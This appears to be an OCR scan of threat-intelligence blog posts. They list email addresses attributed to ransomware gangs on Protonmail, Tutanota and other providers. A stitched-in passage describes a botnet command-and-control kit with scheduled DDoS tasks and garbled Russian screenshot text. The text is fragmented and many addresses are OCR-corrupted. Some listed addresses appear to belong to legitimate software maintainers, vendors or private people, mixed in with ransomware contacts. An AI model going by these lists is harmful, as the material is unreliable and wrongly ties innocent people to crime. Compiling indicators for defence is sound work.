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krastoken@gmail.com 
hudsonamily@gmail.com 
Iwei@malwarebytes.com 
tuhafcoderus@protonmail.com 
carecaxyz@pm.me 

support _blackkingdom2@protonmail.com 
china _jm@protonmail.ch 
pinkiwinki78@mail.ru 
WannaRenemal@goat.si 
WannaReneval@goat.si 

Bossi tosi@protonmail.com 
maill helpme@protonmail.com 
newneo1312@protonmail.com 
bitsupportz@protonmail.com 
bitsupportz@cock.li 
brovsky@aol.com 
brovsky@airmail.cc 
asmodey3301@protonmail.com 
btc _bitts@protonmail.com 
decryption@qbmail.biz 
reservedecryption@protonmail.com 
buydecryptor@aol.com 
po2977@protonmail.com 
Helprecovery@qbmail.biz 
Tbr66@protonmail.com 
stevenxx134@gmail.com 
Encryptedxtredboy@protonmail.com 
steven77xx@mail.ru 
Hichkasam@protonmail.com 
helpdiamond@protonmail.com 
unlOckerpkx@tutanota.com 
Elmershawn@aol.com 
encryptc4@protonmail.com 
decoderma@tutanota.com 


decoderma@protonmail.com 
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missdecryptor@protonmail.com 
VoidFiles@tutanota.com 
VoidFiles@protonmail.com 
Pentagonl11@protonmail.com 
guaranteedsupport@protonmail.com 
coronavirus19@tutanota.com 
ghostmax@cock.|i 
decrypterfile@mailfence.com 
hosdecoder@aol.com 
decrypterfile@protonmail.com 
colderman@mailfence.com 
encryptfile@protonmail.com 
encryptfile@cock.li 
rsaencrypt@tutanota.com 
rsaencrypt@protonmail.ch 
Wannadecryption@gmail.com 
SpadeEncrypt@tutanota.com 
SpadeEncrypt@protonmail.com 
dr8002dr@mailfence.com 
recoverlLO0@tutanota.com 
peace491@tuta.io 
alix1011@mailfence.com 
honorsafe@keemail.me 
honorsafe@protonmail.ch 
galivertones@aol.com 
lossdata@tutanota.com 
encryptadm@criptext.com 
decryptadm@criptext.com 
Windows358@tuta.io 
windows358@mailfence.com 
rebkeilo@gmail.com 
decode.emf@tutanota.com 
Adm0251@tuta.io 
Aser51a0@protonmail.io 


whiopera@tutanota.com 
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whiopera@aol.com 
Openfileyou@protonmail.com 
Openfileyou@mailfence.com 
openthefile@tutanota.com 
decodeacrux@gmail.com 
decodeacrux@msgsafe.io 
wyooy@tutanota.com 
Decode@criptext.com 
Howtodecrypt@elude.in 
xmasnpor@tuta.io 
voidcrypthelp@gmail.com 
ahms@mail.ru 
zorab28@protonmail.com 
UnluckyWare@torbox3uiot6wchz.onion 
UnluckyWare@mail2tor.com 
4lok3r@protonmail.com 
4lok3r@tutanota.com 
TwoHearts911@protonmil.com 
jerjis@tuta.io 
jerjis@tutamail.com 

unlock _rabbit@pm.me 
Gomanje@!Indea. info 
info@russianvip.io 
Try2Cry@Indea.info 
keepcredit015@protonmail.com 
honestman0023@protonmail.com 
fairman0023@protonmail.com 
tuvieja@yopmail.com 
alt.ya-20xswvd@yopmail.com 
officialintuitsoftware@gmail.com 
xp10.ransom@gmail.com 
geneve010@protonmail.com 
geneve020@protonmail.com 
BM-2cT4ifo6SY9QW7gPUJ4EvfeBrJM5j WR4TQ@bitmessage.ch 
haunexuwofwuf@protonmail.com 
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The average web based command and control kit for a botnet consisting of single user, single 
Campaign functions only, has just lost its charm, with a recent discovery of a proprietary 
botnet kit whose features clearly indicate that the kit’s coder know exactly which niches to 
fill - presumably based on his personal experience or market research into competing products. 


What are some its key differentiation factors? Multitasking at its best, for instance, the 
kits provides the botnet master with the opportunity to manage numerous different task such 
as several malware campaigns and DDoS attacks simultaneously, where each of these gets a 
separate metrics page. 
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cyber.duskfly@protonmail.com 
lasvegasincel@cocl.li 
duskeer@protonmail.com 


lasvegasincel@cock.li 
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anon4113@protonmail.com 
mars dec@outlook.com 

anton _ivan _8989@mail.ru 
nataliaburduniuc96@gmail.com 
aliseoanal@gmail.com 
FileEngineering@mailfence.com 
FileEngineering@tutanota.com 
FileEngineering@elude.in 
ICanFixYourFiles@tutanota.com 
ICanDecryptYourFiles@cock.li 
egalytyy@protonmail.com 
johnborn@cock.|i 

jborn@tuta.io 

ransom. izi.crypt@gmail.com 
VovanAndLexus@cock.|i 
eiklot@hi2.in 
omm72031@yandex.ru 
onimransom@cock.|i 
onimransom@protonmail.com 
Whiteblackgroup002@gmail.com 
Wbgroup022@gmail.com 
FilesRecoverEN@Gmail.com 
FilesRecoverEN@Protonmail.com 
psychopath7@tutanota.com 
Myfiles.sir@gmail.com 
ramilo2122@yandex.com 
hanta@420blaze.it 
n3twOrm@tuta.io 
nationalsiense@protonmail.com 


iosif.lancmann@mail.ru 
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securityagent@techmail.info 
zitenmax@rambler.ru 
BlackSpyro@tutanota.com 
BlackSpyro@mailfence.com 
Cryptomafia@tuta.io 
Zakripper@mail.com 
Becky.cely2@aol.com 

mk _cyrox@aol.com 
Funox@ya.ru 
black.mirror@qq.com 
Repairme2017@keemail.me 
sammer winter@aol.com 
Secure2017@tuta.io 
Decryptoffice@tuta.io 
Beauchamp.tammie@mail.ru 
freefoams@protonmail.com 
albertkerr94@mail.com 
Averia@tuta.io 
Cde@onionmail.info 
FHYPOLITE@dallasisd.org 
1_kill yourself 1@protonmail.com 
Look1213@protonmail.com 
Support@decrypt.ws 
restorel9@cock.li 
silver@decryption.biz 
decryptorsoon301@aol.com 
bronmerkberpa1976@protonmail.com 
help@cairihi.com 
Badfail@qq.com 
Zeman@tutanota.de 

_ _murzik@jabber.mipt.ru 
Desparo@tuta.io 
Murzik@jabber.mipt.ru 
Helps@tutanota.com 


Ivan _gargurevich@yahoo.com 
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datadecryption@bitmessage.ch 
Info@fugunator.de 
icrypt@cock.li 
helpersmasters@airmail.cc 
Pdfhelp@india.com 
BTCBREWERY@protonmail.com 
seed@firemail.cc 
NastasyaTurkina68@mail.ru 
ht2707@email.vccs.edu 
Decryptmyfiles@qq.com 
langolier@airmail.cc 
wallyredd@aol.com 
petrus34@p-security.|i 
Vengisto@india.com 
support@p-security.|i 
crypted luedtkis@feudtory.com 
Back _me@foxmail.com.ph 
cybergroup11@aol.com 
data1992@protonmail.com 
pixell@tutanota.com.ph 
StuardRitchi@tutanota.com 
venomous.files@tutanota.com 
rans contact@xmpp.jp 
pentros30@protonmail.com 
pentaxyz777@protonmail.com 
gxa34rttf50gqlagnes@gmail.com 
God85Ar@yandex.com 
jetl100@safe-mail.net 
Figskici@tutanota.com 
axitrun@tutanota.com 
markusdoc88@yahoo.com 
markusdoc88@tutanota.com 
reddragon3335799@protonmail.ch 
jalicry@pm.me 
crvhelp@dr.com 
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dagsdruyt@cumallover.me 
hacker@gmail.com 
hacker2@gmail.com 
dry.eye@mailfence.com 
dryeye21@tutanota.com 
dryeye21@elude.in 
giveyoukey@tutanota.com 
giveyoukey@cock.li 

recovery Potes@firemail.de 
generalchin@countermail.com 
tyughjvobn13@scryptmail.com 
TentwenUpper1l@protonmail.com 
Wenuptwenl@tutanota.com 
programiletisim1@gmail.com 
DiskDoctor@protonmail.com 
waiting@india.com 
soft2018@tutanota.com 
soft2018@mail.ee 
newsoft2018@yandex.by 
bomboms123@mail.ru 
yourfood20@mail.ru 
hipanda@keemail.me 
hipandahi@protonmail.ch 
ialpatntedu@protonmail.com 
cryptofiles20202020@protonmail.com 
cryptofiles20202020@cock.li 
pacman.support@protonmail.com 
29 pwned@gmail.com 
3mvlyd3@gmail.com 
hemant.frnz@gmail.com 
nmarkusdoc88@criptext.com 
nmarkusdoc88@yahoo.com 
nmarkusdoc88@tutanota.com 
nclay _whoami _1@protonmail.ch 
nwaiting@bitmessage.ch 
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nwaiting@india.com 
nDiskDoctor@protonmail.com 
ngiveyoukey@tutanota.com 
njalicry@pm.me 
Agella@scryptmail.com 
Mk.goro@aol.com 
Apple.pass@mail.com 
Applehelp@caramail.com 
keyforyou@tuta.io 
jakie.nunes@tutanota.com 
Cho.dambler@yandex.com 
Noreply@kpnmail.eu 
abu.khan@india.com 
Blammo@cock.|i 
wog@onionmail.info 
TheZenis@Tutanota.com 
recoverfile@mail2tor.com 
jewsaintpeople@india.com 
Filecode99@cock.li.ar 

vurten _knyert@protonmail.com 
return.data@qq.com.ar 
horsia@airmail.cc 
synack@secmail.pro 
Recover@8chan.co 

regem _regum@aol.com.onion 
Dsupport@protonmail.com 
truongquocvi@gmail.com 
Julian.soto@gmail.com 
paydecryption@qq.com 
savefiles@india.com 
microsoftxyber@hackindex.com 
suppfirecrypt@qq.com 
Unlockmeplease@cock.|i 
Keyfiles@cock.li 


SafeGman@protonmail.com 
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helpshadow@firemail.cc 
aztecdecrypt@protonmail.com 
pizdasobaki@protonmail.com 
cryptoplant@protonmail.com 
undogdianact1986@aol.com 
payadobe@yahoo.com 
callmegoat@protonmail.com 
Donaldtrump@rapidteamail.com 
cryptor55@cock.li 
Dr.crypt@aol.com 
aq811@tutoanota.com 
Blackdragon43@yahoo.com 
NetGanster@protonmail.com 
unlockdata@foxmail.co 
Fetmyfilesback@airmail.cc 
SecurCyber@yahoo.com 
Anonymous1@metronet.hr 
dresdent@protonmail.com 
dresdent@protonmail.co 
Cryfixfoo@qq.com 
decrypttos@cock.|i 
Btcdecoding@foxmail.co 
eladovinl1975@protonmail.com 
your last chance@thesecure.biz 
your last chance _help@elude.in 
dfvdv@tutanota.com 
hallome@tutanota.com 
charmant@firemail.cc 
hjelp.main@protonmail.com.de 
cashdashsentme@protonmail.com 
jack@greensock.com 
Redshitline@india.com 
nowayout@sigaint.org 
Cryptmanager@protonmail.com 
admin@spacedatas.co 

18278 


ponce.lorena@aol.co 
Onecrypt@aol.com 
encrypt2020@outlook.com 
encrypt2020@cock.li 
helpyouhelpyou@cock.li 
helpyou2helpyou@cock.li 
Buruk01@india.com 
Serverdrona@gmail.com 
filii_noctis@aol.com 
Decoder@keemail.me 
crypto.support@aol.com 
infodeptl999@yandex.com 
bobwhite@msgsafe.io 
bobwhite@cock.|i 
jessymail26@tuta.io 
twovm1iqzi@aol.com 
TomLee24@tuta.io 
dongeswas@tutanota.co 
wlojul@secmail.pro 
ffgghtdfg@cock.li 
Corpseworm@protonmail.com 
Salesrestoresoftware@gmail.co 
trees.jog.bepabepababy1@protonmail.com 
yuzhou13@tutanota.com 
fonix@tuta.io 
fonix@mailfence.com 
twist@airmail.cc 
MerlinVelso@protonmail.com 
kumarrohitl01986@gmail.com 
info@roblox.com 
nhelpmanager@firemail.cc 
nhelpmanager@iran.ir 
stopfilesrestore@bitmessage.ch 
stopfilesrestore@india.com 


nstopfilesrestore@bitmessage.ch 
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nstopfilesrestore@india.com 
username@gmail.com 
support@netflixtech.com 
ask@virus-removal.info 
virusremovalg@gmail.com 
netici@mailtemp.ch 
thewiz6688@sigaint.org 
youneedmail@protonmail.co 
Babyfromparadise666@gmail.com 
Support@qbmail.bi 
cybergroup1@aol.co 
checkcheck07@qq.co 
webmaster@2-remove-virus.com 
fessleak@qip.ru 

5ss5c@mail.ru 
Oxlservice@protonmail.com 
repter@tuta.io 
konxnobx@tutanota.com 
HappyNewYear2021@tutanota.com 
Kromber@tutanota.com 
Unlock11@protonmail.com 
no-reply@gmail.com 
amangus@india.com 
mcerdem82@yahoo.com 
paymenttoday@firemail.cc 
paytoday@firemail.cc 
eternalnightmare@tutanota.com 
qkhooks0708@protonmail.com 
grethen@tuta.io 
submit@securitystronghold.com 
wang.chang888@tutanota.com 
Kromber@protonmail.com 
Kromber@india.com 
raingemaximo@protonmail.com 
gareth.mckie3I@protonmail.com 
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sexy _chief@aol.com 
johncastle@msgsafe.io 


maykeljakson@criptext.com 


aperfectday2018@protonmail.com 


penkatyjamie@yahoo.com 
bakfiles@protonmail.com 
benitsanstravaille@outlook.fr 
frthnfdsgalknbvfkj@outlook.fr 
geniesanstravaille@outlook.fr 
benitsanstravaille@yahoo.fr 
frthnfdsgalknbvfkj@yahoo.com 
geniesanstravaille@yahoo.fr 
benitsanstravaille@gmail.com 
frthnfdsgalknbvfkj@gmail.com 
geniesanstravaille@gmail.com 
Mmk.scorpion@aol.com 
orlegionfromheaven@india.com 
destroed total@aol.com 
stopper@india.com 
mkliukang@india.com 
evil@cock.lu 
admin@bugsfighter.com 
walter1964@mail2tor.com 
stevegabriel2000@gmail.com 
coronaVi2022@protonmail.ch 
coronavi2022@protonmall.ch 
support@enigmasoftware.com 
gdpr@enigmasoftware.com 
recoverdata@onionmail.org 
affillates@shareit.com 
rob.groves@btinternet.com 
daniel@haxx.se 
openssl-core@openssl.org 
jloup@gzip.org 
madler@alumni.caltech.edu 
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jseward@bzip.org 
giuseppe@iuculano. it 
hpa@zytor.com 

srivasta@debian.org 
sds@epoch.ncsc.mil 
d.paleino@gmail.com 
mjg59@srcf.ucam.org 
noodles@earth. |i 
gandalf@le-vert.net 
djwong@us.ibm.com 
simshawj@us.iobm.com 
bikko@us.iobm.com 
sos@FreeBSD.org 
lokesh.aero@gmail.com 
uupaa.js@gmail.com 
helpshadow@india.com 
ordersupport@mycommerce.com 
ordersupport.ja@mycommerce.com 
ordersupport.es@mycommerce.com 
ordersupport.pt@mycommerce.com 
ordersupport.it@mycommerce.com 
ordersupport.de@mycommerce.com 
ordersupport.fr@mycommerce.com 
ordersupport.ni@mycommerce.com 
ordersupport.cn@mycommerce.com 
ordersupport.zh@mycommerce.com 
volcano666@tutanota.de 
help24decrypt@cock.li 
customerservice@safecart.com 
support@safecart.com 
shopper@esellerate.net 
jason@onehackoranother.com 

mark _white@mail.ua 
carlosrestore2020@aol.com 
Paradise@all-ransomware.info 
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[nasnoe mento + Sanewn + Crpeske + Bei ponmzoesrer: admin ( Bima, ) 


_ 
AKTvBHbIe 3agaum :: Loader [ GOxoBuTD | | 


00 4 HyxHo 3arpyavT: LOOD. 3arpyKero: 1. Ocranoch: 999 
CoctoaHve: BbINOJIHAETCA 


a 
AKTMBHbIe 3agaum :: DDoS [ O6vo8uTD | 


00 96 Saxeecteceano: 0 GoTos. Orpseyer2: 100 GoTos. On-Line: 1 fotos. 


SanyuyeHo: 
Bde task name Coctosmve : SABEPLUEHO April 6, 2008, 04:31:12 
Coctose cata: PABDTAET 


ee Bononxretca: 138914ceK. Octanocs: Ocex. 
(100,00%) 
c 7 
ra SaqehcTecesHo: 0 v3 100 irit. 
(0.00%) 


3anetcTeokaHo : O va 1 online. 
(0.00%) 
00 96 SaxerictecesHo: O GoTos. Orpaiuctse: 100 BoToe. On-Line: 1 fotos. 
CoctosHve : SABEPLUEHO 


Qos task name a 
Coctose calita: PABOTAET 


a: 
aaa Bemonnaerca: 136423ceK. Octanoce: Ocex. 


ao SanetcreosaHo: O v3 100 brit. 


JanercTeokaHo : 0 ve 1 onine. 


[_—Teoaanenre —) [__Ocramoewre [Yams ) 


Automation of malicious tasks, by setting up tasks, and issuing notices on the status of the 
task, when it was run and when it was ended. Just consider the possibilities for a scheduling 
malware and DDoS attacks for different quarters. 


Segmentation in every aspect of the tasks, for instance, a DDoS attacks against a par- 


ticular site can be scheduled to launched on a specific date from infected hosts based in 
chosen countries only. 


1831 


service@paypal.com 
frosculandra1975@protonmail.com 
trafyralhil988@protonmail.com 
sanctornopul1986@protonmail.com 
ringpawslanin1984@protonmail.com 
liebupneoplan19@protonmail.com 
stivobemun1979@protonmail.com 
guifullchartil970@protonmail.com 
phrasitliter1981@protonmail.com 
elsleepamlen1988@protonmail.com 
southbvilolor1973@protonmail.com 
glocadboysun1978@protonmail.com 
carbedispgret1983@protonmail.com 
listun@protonmail.com 
mirtum@protonmail.com 
maxgary777@protonmail.com 
ranosfinger@protonmail.com 
bootsdurslecne1976@protonmail.com 
rinmayturly1972@protonmail.com 
niggchiphoter1974@protonmail.com 
lebssickronne1982@protonmail.com 
daybayrikil970@protonmail.com 
southbvillor1973@protonmail.com 
bottesdurslecne1976@protonmail.com 
service@Gibberishpal.com 
unlockransomware@protonmail.com 
fahidremu1981@protonmail.com 
neybvilolor1973@protonmail.com 
frasesitliter1981@protonmail.com 

jc _finley@yahoo.com 
greatideacompany@gmail.com 
Metasploit@post.com 
kc-lai@tascogroup.com.tw 
hosomhelp@aol.com 


getyourdata@protonmail.com 


18283 


getacrypt@airmail.cc 
21btc@tuta.io 

cobra _locker666@protonmail.ch 
meterp@torontomail.com 
meterpreter@null.net 
E-Mail-HappyNewYear2021@tutanota.com 
E-Mail-metasploit@post.com 
rico@ricostacruz.com 
2020@outlook.com 

2020@cock.li 

123@tutanota.com 
Usacrypt@aol.com 
nochange@tuta.io 
mr.yoba@aol.com 
hernansec@protonmail.ch 
mr.lpcap@aol.com 
manager@securitystronghold.com 
support@sweetim.com 
MAILER-DAEMON@nm30.bullet.mail.sp2.yahoo.com 
seaton.mctavish@yahoo.com 
653905.79556.bm@omp1052.mail.sp2.yahoo.com 
elektricnut@bigpond.com 
careers@incat.com.au 

no _reply@careerone.com.au 
mapenterprises@live.com.au 
whawksworph@skilled.com.au 
nico.smit@bigpond.com 
jmekina@mekinatechnologies.com 
stella.star@telkomsa.net 
seazosurf@yahoo.com 
auPlombiren@hotmail.com 
Decryptioncenter2016@gmail.com 
pcstuntman@onionmail.org 
rkmr121@rediffmail.com 
ravenheim@hotmail.com 
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meme71973@hotmail.com 
mundus@newmail.dk 


siongkin@hotmail.com 


kandagatla_sandeep@yahoo.in 


san _goko@yahoo.com 


sasuke of the uchiha@hotmail.com 


veritasgeek@yahoo.com 


supportperiox@ywtpdnpwihbyuvck.onion 


prometheushelp@mail.ch 
fuckparadise@heniiv.com 
ciastko.zlukrem@gmail.com 
onim72031@yandex.ru 
anonimus.mr@yahoo.com 
airbusbtc@goat.si 
pecunia0318@tutanota.com 
matrixBTC@keemail.me 
reply@forgetit.com 
Tors@tuta.io 

mr _chack33@india.com 
maykolinl234@aol.com 
Darknes@420blaze.it 
mpa9698@live.com 


BigBobRoss@computer4u.com 


bellevueinject@openmailbox.org 


blower@india.com 
blower@firemail.cc 
nostrol9@protonmail.com 
garrantydecrypt@airmail.cc 
cryptohitman@yandex.com 
criptote@hmamail.com 
referas@hmamail.com 
terder@hmamail.com 
utera@hmamail.com 
criptotak@hmamail.com 


umbredecrypt@engineer.com 
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umbrehelp@consultant.com 
contacts.spywaretechs@gmail.com 
Files4463 @tuta.io 
8utG5jFU-lukkgfbr.Files4463@tuta.io 
Files4463@protonmail.ch 
Files4463@gmail.com 
RestoreFile@protonmail.com 
RestoreFile@qq.com 

Stay tuned! 


1. https://ddanchev.blogspot.com/2021/05/exposing-protonmail-and-tutanotas.htm 


17.10.10 "Exposing Protonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - 
A Compilation of Currently Active Ransomware-Themed Email Addresses - 
Part Three (2021-10-04 00:41) 
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Dear blog readers, 


This is Dancho and I’ve decided to share yet another currently active [2]Tutanota ransomware 
themed email address accounts with the idea to attempt to take them offline potentially causing 
financial and related issues to the individuals behind these campaigns. 
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Sample currently active Tutanota ransomware themed email address accounts known to have 
been involved in related malicious and fraudulent campaigns: 


123@tutanota.com 
4lok3r@tutanota.com 
9eab6e85bd12b@tutanota.com 
BCPFILE17@tutanota.com 
BlackSpyro@tutanota.com 
Blacknord@tutanota.com 
BobGreen85@tutanota.com 
Ctorsenoria@tutanota.com 
Decfile431@tutanota.com 
Decrpt@tutanota.com 
DouarixX@tutanota.com 
E-Mail-HappyNewYear2021@tutanota.com 
EnceryptedFiles@tutanota.com 
Encrypt4u@tutanota.com 
EpsilonCrypt@tutanota.com 
Figskici@tutanota.com 
FileEngineering@tutanota.com 
FilesHelp@tutanota.com 
GooodMorning@tutanota.com 
HappyNewYear2021@tutanota.com 
Helpcrypt1@tutanota.com 
Helps@tutanota.com 
Helpsdec@tutanota.com 
Hiden _pro@tutanota.com 
HydaHelp1@tutanota.com 
ICanFixYourFiles@tutanota.com 
JohnMuller88@tutanota.com 
Kromber@tutanota.com 
Patagonoa92@tutanota.com 
RestorFile@tutanota.com 
ReturnEncerypted@tutanota.com 
Sacura889@tutanota.com 
Sherminator.help@tutanota.com 
SimpleSup@tutanota.com 
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Soportevoid@tutanota.com 
SpadeEncrypt@tutanota.com 
StuardRitchi@tutanota.com 
Swordflsh@tutanota.com 
Szems@tutanota.com 
TheZenis@Tutanota.com 
VoidFiles@tutanota.com 
Wenuptwen1l@tutanota.com 
ammon0503@tutanota.com 
artemy75@tutanota.com 
askhelp@tutanota.com 
axitrun2@tutanota.com 
axitrun@tutanota.com 
barboza40@tutanota.com 
bbbitcrypt@tutanota.com 
blackmax@tutanota.com 
charlieSuport@tutanota.com 
clifieb@tutanota.com 
clyde.barrow15@tutanota.com 
coleman.dec@tutanota.com 
com-gloria@tutanota.com 
coronavirus19@tutanota.com 
cricket@tutanota.com 
cryptget@tutanota.com 
cryptlocker@tutanota.com 
darkencryptor@tutanota.com 
darkwaiderr@tutanota.com 
datareesstore@tutanota.com 
decode.emf@tutanota.com 
decoderma@tutanota.com 
dfvdv@tutanota.com 
dokulus@tutanota.com 
dozusopo@tutanota.com 
dryidik@tutanota.com 
dts1024@tutanota.com 
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eternalnightmare@tutanota.com 
filekerk@tutanota.com 
filesrestore@tutanota.com 
fixbyfinch@tutanota.com 
flower.harris@tutanota.com 
garrymagic@tutanota.com 
getthekey@tutanota.com 
giveyoukey@tutanota.com 
grdoks@tutanota.com 
hallome@tutanota.com 
help73@tutanota.com 
help@tutanota.com 
helpyoubus11@tutanota.com 
hildaseriesnetflix125@tutanota.com 
hinduism0720@tutanota.com 
hlper4y@tutanota.com 
host2021@tutanota.com 
jakie.nunes@tutanota.com 
jamesbond2021@tutanota.com 
job2019@tutanota.com 
johnsmith987654@tutanota.com 
johnsonwhate@tutanota.com 
khalate@tutanota.com 
klowershit1835@tutanota.com 
kokux@tutanota.com 
konxnobx@tutanota.com 
legalrestore@tutanota.com 
lossdata@tutanota.com 
mammon0503@tutanota.com 
mccreight.ellery@tutanota.com 
member987 @tutanota.com 
moloch _helpdesk@tutanota.com 
mr.dec@tutanota.com 
nAskHelp@tutanota.com 


nBobGreen85@tutanota.com 
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nEpsilonCrypt@tutanota.com 
nHydaHelp1@tutanota.com 
nbarboza40@tutanota.com 
ncoleman.dec@tutanota.com 
neftet@tutanota.com 
ngiveyoukey@tutanota.com 
nklowershit1835@tutanota.com 
nmode@tutanota.com 
notgoodnews@tutanota.com 
nretrnyoufiles23@tutanota.com 
openthefile@tutanota.com 
ormechal9@tutanota.com 
pashmak@tutanota.com 
patrikOO8@tutanota.com 
pecunia0318@tutanota.com 
peloment@tutanota.com 
phobosrecovery@tutanota.com 
pixell@tutanota.com 
poker021@tutanota.com 
psychopath7@tutanota.com 
pvphIp@tutanota.com 
python100@tutanota.com 
qar48@tutanota.com 
raynorzlol@tutanota.com 
recoverL0@tutanota.com 
remotePChelper@tutanota.com 
retrnyoufiles23@tutanota.com 
rsaencrypt@tutanota.com 
samsung00700@tutanota.com 
savemyselfl@tutanota.com 
serhio.vale@tutanota.com 
skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
smartrecav@tutanota.com 
spacexhuman@tutanota.com 
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subikO99@tutanota.com 
systems@tutanota.com 
szem@tutanota.com 
tHydaHelp1@tutanota.com 
tchukopchu@tutanota.com 
tcprx@tutanota.com 
triplock@tutanota.com 
unlOckerpkx@tutanota.com 
wang.chang888@tutanota.com 
whiopera@tutanota.com 
whizoze@tutanota.com 
wyooy@tutanota.com 
xilttbg@tutanota.com 
xser@tutanota.com 
xzet@tutanota.com 
yasomoto@tutanota.com 
yongloun@tutanota.com 
yuzhou13@tutanota.com 
yyuzhou13@tutanota.com 
zxqwopnm@tutanota.com 


Sample related Tutanota ransomware themed email address accounts known to have been 
involved in related fraudulent and malicious campaigns: 


dts1024@tutanota.com 
vassago 0203@tutanota.com 
moloch _helpdesk@tutanota.com 
triplock@tutanota.com 
Benford333@tutanota.com 
nBenford333@tutanota.com 
shadowghosts@tutanota.com 
nshadowghosts@tutanota.com 
helpforyoupc@tutanota.com 
RestorFile@tutanota.com 
adresspower@tutanota.com 
Hiden _pro@tutanota.com 
Blacknord@tutanota.com 
systems@tutanota.com 
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xzet@tutanota.com 
szem@tutanota.com 
help@tutanota.com 
Szems@tutanota.com 
Patagonoa92@tutanota.com 
mr.dec@tutanota.com 
nmode@tutanota.com 
python100@tutanota.com 
yasomoto@tutanota.com 
dokulus@tutanota.com 
axitrun2@tutanota.com 
hlper4y@tutanota.com 
patrikOO8@tutanota.com 
tchukopchu@tutanota.com 
pashmak@tutanota.com 
savemyselfl@tutanota.com 
yyuzhou13@tutanota.com 
tcprx@tutanota.com 
pvphIp@tutanota.com 
dryidik@tutanota.com 
notgoodnews@tutanota.com 
clifieb@tutanota.com 
blackmax@tutanota.com 
askhelp@tutanota.com 
ragnarOk@tutanota.com 
barboza40@tutanota.com 
HydaHelp1@tutanota.com 
neftet@tutanota.com 
EpsilonCrypt@tutanota.com 
hinduism0720@tutanota.com 
mammon0503@tutanota.com 
ammon0503@tutanota.com 
samsung00700@tutanota.com 
klowershit1835@tutanota.com 
retrnyoufiles23@tutanota.com 
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Customized DDoS in the sense of empowering the botnet master with point’n’click ability to 
dedicate a precise number of the bots to participate, which countries they should be based 
in, and for how long the attack should remain active. Quality and assurance in DDoS attacks 
based on the measurement of the bot’s bandwidth against a particular country, in this case 
the object of the attack, so theoretically bots from neighboring countries would DDoS the 
country in question far more efficiently. 


[naBHoe MeHtoO ¥ Sagaun Y CnpabKa ¥ 
7 @ Aobasnth sarpy3Kn 

Aobasntb DDoS sagayy: HTTP 
@ Aobasntb DDoS sagauy: ICMP 
— @ Aobasntb DDoS sagauy: IGMP 
—_@ JobfasuTb DDoS sagayuy: UDP 


Historical malware campaign performance, is perhaps the most quality assurance feature in 
the entire kit, presumably created in order to allow the person behind it to measure which 
were the most effective malware and DDoS campaigns that he executed in the past. From 
an OSINT perspective, sacrificing his operational security by maintaing detailed logs from 
previous attacks is a gold mine directly establishing his relationships with previous malware 
campaigns. 
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clyde.barrow15@tutanota.com 
Decrpt@tutanota.com 
Encrypt4u@tutanota.com 
Helpsdec@tutanota.com 
Soportevoid@tutanota.com 
getthekey@tutanota.com 
whizoze@tutanota.com 
DouariX@tutanota.com 
poker021@tutanota.com 
ZadarusFiles@tutanota.com 
xsmaxs@tutanota.com 
Sacura889@tutanota.com 
yongloun@tutanota.com 
dozusopo@tutanota.com 
EnceryptedFiles@tutanota.com 
ReturnEncerypted@tutanota.com 
nbarboza40@tutanota.com 
nklowershit1835@tutanota.com 
nragnarOk@tutanota.com 
nretrnyoufiles23@tutanota.com 
nEpsilonCrypt@tutanota.com 
nAskHelp@tutanota.com 
filesrestore@tutanota.com 
garrymagic@tutanota.com 
darkwaiderr@tutanota.com 
job2019@tutanota.com 
pixell@tutanota.com 
phobosrecovery@tutanota.com 
com-gloria@tutanota.com 
raynorzlol@tutanota.com 
member987 @tutanota.com 
bbbitcrypt@tutanota.com 
kokux@tutanota.com 
mccreight.ellery@tutanota.com 


SimpleSup@tutanota.com 
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subikO99@tutanota.com 
spacexhuman@tutanota.com 
serhio.vale@tutanota.com 
helpyoubus11@tutanota.com 
johnsonwhate@tutanota.com 
remotePChelper@tutanota.com 
BCPFILE17@tutanota.com 
xilttbg@tutanota.com 
legalrestore@tutanota.com 
Swordflsh@tutanota.com 
host2021@tutanota.com 
skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
cryptlocker@tutanota.com 
help73@tutanota.com 
johnsmith987654@tutanota.com 
filekerk@tutanota.com 
cricket@tutanota.com 
artemy75@tutanota.com 
Helpcryptl@tutanota.com 
FilesHelp@tutanota.com 
darkencryptor@tutanota.com 
smartrecav@tutanota.com 
Decfile431@tutanota.com 
9eab6e85bd12b@tutanota.com 
cryptget@tutanota.com 
flower.harris@tutanota.com 
hildaseriesnetflix125@tutanota.com 
datareesstore@tutanota.com 
zxqwopnm@tutanota.com 
lafoievologjaninl23@tutanota.com 
buratino2@tutanota.com 
onlinebigbrotheriswatchingyou@tutanota.com 
MattCohn@tutanota.com 


restmefast@tutanota.com 
18294 


grdoks@tutanota.com 
unlOckerpkx@tutanota.com 
decoderma@tutanota.com 
VoidFiles@tutanota.com 
coronavirus19@tutanota.com 
rsaencrypt@tutanota.com 
SpadeEncrypt@tutanota.com 
recoverlLO0@tutanota.com 
lossdata@tutanota.com 
decode.emf@tutanota.com 
whiopera@tutanota.com 
openthefile@tutanota.com 
wyooy@tutanota.com 
4lok3r@tutanota.com 
FileEngineering@tutanota.com 
ICanFixYourFiles@tutanota.com 
psychopath7@tutanota.com 
BlackSpyro@tutanota.com 
Helps@tutanota.com 
StuardRitchi@tutanota.com 
venomous.files@tutanota.com 
Figskici@tutanota.com 
axitrun@tutanota.com 
markusdoc88@tutanota.com 
dryeye21@tutanota.com 
giveyoukey@tutanota.com 
Wenuptwenl1@tutanota.com 
soft2018@tutanota.com 
nmarkusdoc88@tutanota.com 
ngiveyoukey@tutanota.com 
jakie.nunes@tutanota.com 
TheZenis@Tutanota.com 
dfvdv@tutanota.com 
hallome@tutanota.com 


yuzhou13@tutanota.com 
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konxnobx@tutanota.com 
HappyNewYear2021@tutanota.com 
Kromber@tutanota.com 
eternalnightmare@tutanota.com 
wang.chang888@tutanota.com 
E-Mail-HappyNewYear2021@tutanota.com 
123@tutanota.com 
pecunia0318@tutanota.com 

Stay tuned! 


1. https://1.bp. blogspot .com/-_KOIkETiZkU/YVomMcXoR21/AAAAAAAAUW8/g19VIp3wbhs_sfGglXXkfWSWkEZOmAwqwCLcBGAsYHQ 
s1168/Screenshot_48.png 
2. https: //ddanchev. blogspot .com/2021/05/exposing-protonmail-and-tutanotas htm 


17.10.11 "Exposing Protonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - 
A Compilation of Currently Active Ransomware-Themed Email Addresses - 
Part Two (2021-10-04 00:41) 
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Dear blog readers, 
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This is Dancho and I’ve decided to share a recently obtained portfolio of [2]Protonmail ran- 
